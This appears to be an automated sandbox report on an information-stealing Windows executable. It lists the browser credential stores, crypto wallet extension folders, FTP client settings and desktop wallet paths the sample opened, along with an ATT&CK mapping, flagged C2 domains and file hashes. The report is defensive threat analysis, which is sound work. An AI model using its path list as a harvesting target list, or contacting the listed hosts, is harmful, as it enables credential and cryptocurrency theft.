              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes9.db
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe Directory queried: C:\Users\user\Documents\WSHEJMDVQC
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: Yara match, file source: Process Memory Space: 6RVmzn1DzL.exe PID: 3276, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match, file source: decrypted.memstr, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: 6RVmzn1DzL.exe PID: 3276, type: MEMORYSTR
Source: Yara match, file source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix

Techniques followed by a number in parentheses are the ones this sample matched; the number is the count of matched signatures. Entries without a number are the unmatched cells of the matrix.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Windows Management Instrumentation (1), PowerShell (1), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion (12), Process Injection (1), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), DLL Side-Loading (1), Steganography, Compile After Delivery, Indicator Removal from Tools
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Query Registry (1), Security Software Discovery (161), Virtualization/Sandbox Evasion (12), Process Discovery (2), Application Window Discovery (1), File and Directory Discovery (11), System Information Discovery (13)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Local System (41), Clipboard Data (2), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (21), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Antivirus detection (Source | Detection | Scanner)
6RVmzn1DzL.exe | 18% | ReversingLabs
6RVmzn1DzL.exe | 19% | Virustotal
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
contintnetksows.shop | 172.67.141.234 | true | true | - | unknown

Flagged domains and URLs (Name | Malicious | Antivirus Detection | Reputation)
towerxxuytwi.xyz | true | Avira URL Cloud: malware | unknown
contintnetksows.shop | true | Avira URL Cloud: malware | unknown
penetratedpoopp.xyz | true | Avira URL Cloud: malware | unknown
ellaboratepwsz.xyz | true | Avira URL Cloud: malware | unknown
swellfrrgwwos.xyz | true | Avira URL Cloud: malware | unknown
https://contintnetksows.shop/api | true | Avira URL Cloud: malware | unknown
foodypannyjsud.shop | true | Avira URL Cloud: malware | unknown
pedestriankodwu.xyz | true | Avira URL Cloud: malware | unknown
potterryisiw.shop | true | Avira URL Cloud: malware | unknown
                • Avira URL Cloud: malware
                unknown
                https://contintnetksows.shop/p6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                172.67.141.234 | contintnetksows.shop | United States | | 13335 | CLOUDFLARENETUS | true
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1465909
                Start date and time:2024-07-02 08:31:53 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 29s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:6RVmzn1DzL.exe
                renamed because original name is a hash value
                Original Sample Name:4d73427dc0b9f3dc4b846ace0ddc2deb.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 38
                • Number of non-executed functions: 193
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 104.208.16.94
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                Time | Type | Description
                02:32:51 | API Interceptor | 9x Sleep call for process: 6RVmzn1DzL.exe modified
                02:33:19 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                No context
                No context
                Match: CLOUDFLARENETUS
                Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                Ziraat Bankasi Swift Mesaji.exe | Get hash | malicious | GuLoader | Browse | 172.67.74.152
                DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
                orden de compra.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 188.114.96.3
                https://128.165.205.92.host.secureserver.net/ | Get hash | malicious | HTMLPhisher | Browse | 1.1.1.1
                Ziraat Bankasi Swift Mesaji.exe | Get hash | malicious | GuLoader | Browse | 104.26.13.205
                JDownloaderSetup.exe | Get hash | malicious | Unknown | Browse | 104.16.148.130
                JDownloaderSetup.exe | Get hash | malicious | Unknown | Browse | 104.16.148.130
                FedEx Receipt_53065724643.xls | Get hash | malicious | FormBook | Browse | 188.114.96.3
                SecuriteInfo.com.Win32.Evo-gen.6791.6790.exe | Get hash | malicious | Python Stealer, CStealer, Xmrig | Browse | 104.26.2.16
                http://differentia.ru | Get hash | malicious | Unknown | Browse | 172.67.71.89
                Match: a0e9f5d64349fb13191bc781f81f42e1
                Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                Build.exe | Get hash | malicious | DBatLoader, Neshta | Browse | 172.67.141.234
                F.exe | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | 172.67.141.234
                1719859269.0326595_setup.exe | Get hash | malicious | LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig | Browse | 172.67.141.234
                MOD_200.pdf.lnk | Get hash | malicious | Arc Stealer | Browse | 172.67.141.234
                INQUIRY#809676-JULY1.xla.xlsx | Get hash | malicious | Unknown | Browse | 172.67.141.234
                capisp.dll.dll | Get hash | malicious | Bazar Loader, BruteRatel, Latrodectus | Browse | 172.67.141.234
                20240506_120821.xls | Get hash | malicious | Unknown | Browse | 172.67.141.234
                Renameme@1.xls | Get hash | malicious | Unknown | Browse | 172.67.141.234
                mkFOY01Gl5.exe | Get hash | malicious | LummaC | Browse | 172.67.141.234
                zyJWi2vy29.exe | Get hash | malicious | LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT | Browse | 172.67.141.234
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):1.0425415904336832
                Encrypted:false
                SSDEEP:192://NtB5+s0BU/gjZ/exMzuiFizZ24IO8+U0N:3NtB5+nBU/gjTzuiFizY4IO8+U
                MD5:30CCF4BCB2EBB9C9A662D363FAD114A5
                SHA1:0705B0DEF6D3BA7A4A96D5F2AE9E6A639A82689D
                SHA-256:9364B4194B3A69386A69D7837B70DEB925681EC03653A72E0C4E281FB8C2AC61
                SHA-512:6794BF729363514B42E01720381057E26369FEF9980AE050F636AC3783F2ACE419600B8D396742608F654888DBC9E9DB98DD426828880E25DEF87C94933302F5
                Malicious:true
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.3.7.5.5.8.4.2.5.6.6.7.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.3.7.5.5.8.5.0.9.8.0.9.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.1.3.c.7.0.9.-.5.0.4.a.-.4.f.b.8.-.8.4.c.2.-.c.4.7.0.4.d.4.c.f.2.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.1.2.6.f.1.6.-.7.6.a.f.-.4.7.a.2.-.9.b.3.0.-.7.0.6.5.a.3.2.9.2.2.c.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.R.V.m.z.n.1.D.z.L...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.l.d.e.r.2.i.s.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.c.c.-.0.0.0.1.-.0.0.1.4.-.4.3.6.c.-.6.e.a.3.4.9.c.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.b.c.c.4.4.5.7.6.f.2.e.e.7.2.4.f.c.7.e.1.f.6.8.e.1.d.c.7.6.4.8.0.0.0.0.0.9.0.4.!.0.0.0.0.4.3.b.8.f.f.a.0.9.8.2.6.c.2.1.6.7.6.d.7.5.9.c.0.f.3.d.c.2.0.8.8.c.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Tue Jul 2 06:33:04 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):125340
                Entropy (8bit):1.9963464189301523
                Encrypted:false
                SSDEEP:768:3ViXRpG8BTkqQ2QE0NWmQZ/48wnmphSkIrX:F07QNBE0NW9/on4grX
                MD5:A7F395E348CB55E695CE5F3CC20D7AC0
                SHA1:D6FB083102C88A6038918B172B1B2D920842B4F6
                SHA-256:BF1F1C9D92FEA8734B2D002E91B7CC5DBA7A633BE3A4BC0985D12D92BBF0E3BE
                SHA-512:1537E4BE3473944AC87F805B9CCE21392A806703078205108053CDC1C17E6421EF9D841F59CB35F0E787421B7A9BAC3605EBB52F42433FE9469F86B356C87D0E
                Malicious:false
                Reputation:low
                Preview:MDMP..a..... ....... ..f........................T...(...........|"......D....Q..........`.......8...........T............?............. $...........&..............................................................................eJ.......&......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8378
                Entropy (8bit):3.706154048719564
                Encrypted:false
                SSDEEP:192:R6l7wVeJ5r6IR1i6YEIHSU9o2hgmfp4HHrpry89bx6sf07m:R6lXJF6I26YE4SU9o2hgmfp4H9xZf1
                MD5:76B8BD5C5FD9182337B1C11D0A5581F1
                SHA1:505A29EC3E640D4C389B931A6FB9D91438D28833
                SHA-256:BA14A88F2487F811799AFC4864DB80D8E23F79B360B839410F4286A4C31614CC
                SHA-512:458A5A895E736E1D337DA43079E4669E9DB177D1AC055F292282910BACDDF30E4B126ABAF8594E7B9E51E60EDE8A32D36E46D0FDDB91254626F7EAA442A6E8FB
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.7.6.<./.P.i.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4688
                Entropy (8bit):4.509997748119072
                Encrypted:false
                SSDEEP:48:cvIwWl8zs3Jg77aI9iVWpW8VYmYm8M4JeltgF7+q8Hr7E8aeSrSud:uIjfZI7Qk7VGJF0cRWud
                MD5:1BF3B3B1A4BA7FCD9FCE3ED87D6407CE
                SHA1:B010154566EDA41C07748ED9A44939BE3078B62A
                SHA-256:0F7BF3F3987DA820FF8E1B9CD43EB2B0DE24D3DEF16763EBD902056E070D022C
                SHA-512:97907145C9A8F53187D94C0E2E572B400E0CFB2A9A134619E9DABB89A52EDE8C51B89152486E23CA45D0BE907D8DFC8424E79219FD1FD98FDA61E460B525D436
                Malicious:false
                Reputation:low
